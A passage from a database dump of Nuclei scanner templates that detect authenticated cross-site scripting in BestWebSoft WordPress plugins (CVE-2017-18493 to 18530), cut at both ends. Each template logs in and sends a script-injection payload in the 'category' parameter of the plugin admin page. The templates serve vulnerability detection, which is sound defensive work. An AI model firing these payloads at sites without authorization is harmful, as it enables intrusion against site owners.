https://wordpress.org/plugins/custom-admin-page/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18493\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:custom_admin_page:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: custom_admin_page\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/custom-admin-page/\"\n tags: cve,cve2017,wordpress,bws-adminpage,wpscan,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/custom-admin-page/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Custom Admin Page by\")'\n condition: and\n# digest: 4b0a00483046022100a8f985f73aa53f158d7b69dc00405ae8393492e82583cda9393d45d6e09b86df022100f47e60f2df1bbdfee0a7a9497bda25b96739c2c69f49f2d8b587082bc45df3b6:922c64590222798bb761d5b6d8e72950", "hash": "57d5a168f361a8e44b22b42d94b2ed73", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fdf" }, "name": "CVE-2017-18494.yaml", "content": "id: CVE-2017-18494\n\ninfo:\n name: Custom Search by BestWebSoft < 1.36 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The custom-search-plugin plugin before 1.36 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18494\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18494\n - https://wordpress.org/plugins/custom-search-plugin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18494\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36857\n cpe: cpe:2.3:a:bestwebsoft:custom_search:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: custom_search\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/custom-search-plugin/\"\n tags: cve,cve2017,wordpress,bws-custom-search,wpscan,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/custom-search-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Custom Search by\")'\n condition: and\n# digest: 4b0a00483046022100f9cc3cc8539a1d411d5a0fc2255808c1742059f86723ee77d65a025201fb801e022100d596c70a28642269afc2cafe1fecf0ff789694b8d7407ac813fd2a6adb176d89:922c64590222798bb761d5b6d8e72950", "hash": "45e6e5f05a023255f8345ac82ee8a2ca", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe0" }, "name": "CVE-2017-18496.yaml", "content": "id: CVE-2017-18496\n\ninfo:\n name: Htaccess by BestWebSoft < 1.7.6 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The htaccess plugin before 1.7.6 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18496\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18496\n - https://wordpress.org/plugins/htaccess/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18496\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:htaccess:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: htaccess\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/htaccess/\"\n tags: cve,cve2017,wordpress,wpscan,bws-htaccess,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/htaccess/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Htaccess by\")'\n condition: and\n# digest: 4b0a0048304602210083bbc08d8af961271e098a1736c206c3ef81fc9a67b9886fc1185988a4a8d5310221008313ab9d0915cea1add617dcb62ca6f423209ab3d00216d25b0440fe803c5b40:922c64590222798bb761d5b6d8e72950", "hash": "4bc1d98487e9de6126011ba29e7c02c3", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe1" }, "name": "CVE-2017-18500.yaml", "content": "id: CVE-2017-18500\n\ninfo:\n name: Social Buttons Pack by BestWebSof < 1.1.1 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The social-buttons-pack plugin before 1.1.1 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18500\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18500\n - https://wordpress.org/plugins/social-buttons-pack/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18500\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60522\n cpe: cpe:2.3:a:bestwebsoft:social_buttons_pack:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: social_buttons_pack\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/social-buttons-pack/\"\n tags: cve2017,cve,wordpress,wpscan,bws-social-buttons,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/social-buttons-pack/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Social Buttons Pack by\")'\n condition: and\n# digest: 4a0a00473045022100f89fb19d15fb08118427dcbbec861334e2869b19a7f7629f950880a2b1a030a402204c072011a5c2993febfb3b7ebae8ee5904fd3f1ab56497f1dbfcdc2b0383083d:922c64590222798bb761d5b6d8e72950", "hash": "f66122562d3d7c3c5d6be58706b4362b", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe2" }, "name": "CVE-2017-18501.yaml", "content": "id: CVE-2017-18501\n\ninfo:\n name: Social Login by BestWebSoft < 0.2 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The social-login-bws plugin before 0.2 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18501\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18501\n - https://wordpress.org/plugins/social-login-bws/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18501\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.60522\n cpe: cpe:2.3:a:bestwebsoft:social_login:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: social_login\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/social-login-bws/\"\n tags: cve2017,cve,wordpress,wpscan,bws-social-login,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/social-login-bws/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Social Login by\")'\n condition: and\n# digest: 4a0a00473045022100afda914e7e9726b246e585b8f4faa2ff861c17837ff01ded7c22cbaf1e4ea39e02205a4ecb7f7af6fbd5809cb254f685cee642439232493671b38962a87dfed0b84e:922c64590222798bb761d5b6d8e72950", "hash": "0f3c573141abd8d0963f8fa901ce420c", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe3" }, "name": "CVE-2017-18502.yaml", "content": "id: CVE-2017-18502\n\ninfo:\n name: Subscriber by BestWebSoft < 1.3.5 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The subscriber plugin before 1.3.5 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18502\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18502\n - https://wordpress.org/plugins/subscriber/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18502\n cwe-id: CWE-79\n epss-score: 0.00231\n epss-percentile: 0.61251\n cpe: cpe:2.3:a:bestwebsoft:subscriber:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: subscriber\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/subscriber/\"\n tags: cve2017,cve,wordpress,wpscan,bws-subscribers,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/subscriber/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Subscriber by\")'\n condition: and\n# digest: 4a0a0047304502210092c0a8a182713b0379f504577e9c0a88d2b686eb80d7625f27f9f20fc3442e0002207e24abadc4512d14c9a97c97f04f2c3ddf76f1344b4e8a945a2d00c0732a9410:922c64590222798bb761d5b6d8e72950", "hash": "44ee5b43f2d12a035e3e6a1f109cbd31", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe4" }, "name": "CVE-2017-18505.yaml", "content": "id: CVE-2017-18505\n\ninfo:\n name: BestWebSoft's Twitter < 2.55 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The twitter-plugin plugin before 2.55 for WordPress has XSS.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18505\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18505\n - https://wordpress.org/plugins/twitter-plugin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18505\n cwe-id: CWE-79\n epss-score: 0.00163\n epss-percentile: 0.51969\n cpe: cpe:2.3:a:bestwebsoft:twitter_button:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: twitter_button\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/twitter-plugin/\"\n tags: cve,cve2017,wordpress,wpscan,bws-twitter,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/twitter-plugin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Twitter Button by\")'\n condition: and\n# digest: 4b0a00483046022100a1c5828cf67da18081cde718eb3df76029916bef83ff06ee5d51264e37751dc10221008c464e7a9ae6f75aabb858462c3a0fd473bfcf2e3940b8611d895617e2fb7d9b:922c64590222798bb761d5b6d8e72950", "hash": "3c2ad1342ea26d450d632dd8ba2d5bec", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe5" }, "name": "CVE-2017-18516.yaml", "content": "id: CVE-2017-18516\n\ninfo:\n name: LinkedIn by BestWebSoft < 1.0.5 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-linkedin plugin before 1.0.5 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.0.5\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18516\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18516\n - https://wordpress.org/plugins/bws-linkedin/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18516\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:linkedin:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: linkedin\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/bws-linkedin/\"\n tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-linkedin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-linkedin/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"LinkedIn by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100a4098e76f7a55d8322e7d021a7eb38813ded4ec6d28cf311172d96b63872272c02204aa37545bb0e8ebbd130f622c72698d7d0305c164a9e707c1c013d6bd1b2e961:922c64590222798bb761d5b6d8e72950", "hash": "f9948b617e47c8208ec0a9a1ca68e8ef", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe6" }, "name": "CVE-2017-18517.yaml", "content": "id: CVE-2017-18517\n\ninfo:\n name: Pinterest by BestWebSoft < 1.0.5 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-pinterest plugin before 1.0.5 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.0.5\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18517\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18517\n - https://wordpress.org/plugins/bws-pinterest/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18517\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:pinterest:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: pinterest\n framework: wordpress\n publicwww-query: /wp-content/plugins/bws-pinterest/\n tags: cve,cve2017,wordpress,wpscan,bws-pinterest,wp-plugin,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-pinterest/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Pinterest by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100af2908669633025e0cd2c10a956572c409d05f08269b1acfc20d5f65a54c42a5022059f147b57251e197a65aa9d400012d989a43c66fa4416c1eb7ee9de23ffd4eb8:922c64590222798bb761d5b6d8e72950", "hash": "cd547b0e96de1cccbcae8893a56bd4d9", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe7" }, "name": "CVE-2017-18518.yaml", "content": "id: CVE-2017-18518\n\ninfo:\n name: SMTP by BestWebSoft < 1.1.0 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The bws-smtp plugin before 1.1.0 for WordPress has multiple XSS issues.\n remediation: Fixed in version 1.1.0\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18518\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18518\n - https://wordpress.org/plugins/bws-smtp/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18518\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:smtp:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: smtp\n framework: wordpress\n publicwww-query: /wp-content/plugins/bws-smtp/\n tags: cve,cve2017,wordpress,wp-plugin,wpscan,bws-smtp,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/bws-smtp/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"SMTP by BestWebSoft\")'\n condition: and\n# digest: 4b0a00483046022100ca4f19febda81cd89ac62f3d319631ca3ba438d5c136b4119a5b590e76b81eb4022100c2f1c4f238b7b72d78dbdcfb3579a60e7abd1c1f1e92f5767756df9efdf59ac1:922c64590222798bb761d5b6d8e72950", "hash": "2895d692e66f66cf2b302e25af4abcae", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe8" }, "name": "CVE-2017-18527.yaml", "content": "id: CVE-2017-18527\n\ninfo:\n name: Pagination by BestWebSoft < 1.0.7 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The pagination plugin before 1.0.7 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18527\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18527\n - https://wordpress.org/plugins/pagination/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18527\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36836\n cpe: cpe:2.3:a:bestwebsoft:pagination:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: pagination\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/pagination/\"\n tags: cve2017,cve,wordpress,wp-plugin,wpscan,bws-pagination,bws-xss,authenticated,bestwebsoft,xss\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/pagination/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"Pagination by BestWebSoft\")'\n condition: and\n# digest: 4a0a0047304502207cd86a94cd8aead4a49bbda3b690bb04c0f1febccfb6785b34b253cbab353f48022100e56e0a7397f05b7b5e043e8bf763fbcaf8ea0f17ab29aeecdf9fe91979b4c422:922c64590222798bb761d5b6d8e72950", "hash": "af0286d403301f0e57479221fad43b92", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fe9" }, "name": "CVE-2017-18528.yaml", "content": "id: CVE-2017-18528\n\ninfo:\n name: PDF & Print by BestWebSoft < 1.9.4 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The pdf-print plugin before 1.9.4 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18528\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18528\n - https://wordpress.org/plugins/pdf-print/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18528\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:pdf_\\&_print:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: pdf_\\&_print\n framework: wordpress\n publicwww-query: \"/wp-content/plugins/pdf-print/\"\n tags: cve,cve2017,wordpress,wp-plugin,bws-pdf-print,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/pdf-print/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"PDF & Print by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100bbd7d8507fd10adffb260fac65763dd3af0450f57124c9588276e948193a1f4a02205120b25ba77cad36eec889f71816330835a4b76d3e08924a6bfea9d372b399f4:922c64590222798bb761d5b6d8e72950", "hash": "0119a16578054a48349f4f6c47fa62e4", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307fea" }, "name": "CVE-2017-18529.yaml", "content": "id: CVE-2017-18529\n\ninfo:\n name: PromoBar by BestWebSoft < 1.1.1 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The promobar plugin before 1.1.1 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18529\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18529\n - https://wordpress.org/plugins/promobar/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18529\n cwe-id: CWE-79\n epss-score: 0.00088\n epss-percentile: 0.36245\n cpe: cpe:2.3:a:bestwebsoft:promobar:*:*:*:*:*:wordpress:*:*\n metadata:\n verified: true\n max-request: 3\n vendor: bestwebsoft\n product: promobar\n framework: wordpress\n publicwww-query: /wp-content/plugins/promobar/\n tags: cve,cve2017,wordpress,wp-plugin,bws-promobar,wpscan,xss,authenticated,bestwebsoft\n\nhttp:\n - raw:\n - |\n POST /wp-login.php HTTP/1.1\n Host: {{Hostname}}\n Content-Type: application/x-www-form-urlencoded\n\n log={{username}}&pwd={{password}}&wp-submit=Log+In\n - |\n GET /wp-admin/admin.php?page=bws_panel&category=%22%3E%3C/script%3E%3Cscript%3Ealert(document.domain)%3C/script%3E HTTP/1.1\n Host: {{Hostname}}\n - |\n GET /wp-content/plugins/promobar/readme.txt HTTP/1.1\n Host: {{Hostname}}\n\n matchers:\n - type: dsl\n dsl:\n - 'status_code_2 == 200'\n - 'contains(header_2, \"text/html\")'\n - 'contains(body_2, \">\\\">All\")'\n - 'contains(body_3, \"PromoBar by BestWebSoft\")'\n condition: and\n# digest: 4a0a00473045022100c33283fd423db70d402c7fd047dc7bebc3eec4bff361ff9d59d4b1efbf225c3d0220245cae47085cf15e815dc7d291310b1550e49f9eef084e23e11863a4392656f2:922c64590222798bb761d5b6d8e72950", "hash": "71d97d13e66b0480ad94d2f31fd1a6be", "level": 4, "time": "2024-05-17 23:39:44" }, { "_id": { "$oid": "66477a413521042ccf307feb" }, "name": "CVE-2017-18530.yaml", "content": "id: CVE-2017-18530\n\ninfo:\n name: Rating by BestWebSoft < 0.2 - Cross-Site Scripting\n author: luisfelipe146\n severity: medium\n description: |\n The rating-bws plugin before 0.2 for WordPress has multiple XSS issues.\n reference:\n - https://wpscan.com/vulnerability/efd816c3-90d4-40bf-850a-0e4c1a756694\n - https://nvd.nist.gov/vuln/detail/CVE-2017-18530\n - https://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2017-18530\n - https://wordpress.org/plugins/rating-bws/#developers\n classification:\n cvss-metrics: CVSS:3.0/AV:N/AC:L/PR:N/UI:R/S:C/C:L/I:L/A:N\n cvss-score: 6.1\n cve-id: CVE-2017-18530\n cwe-id: 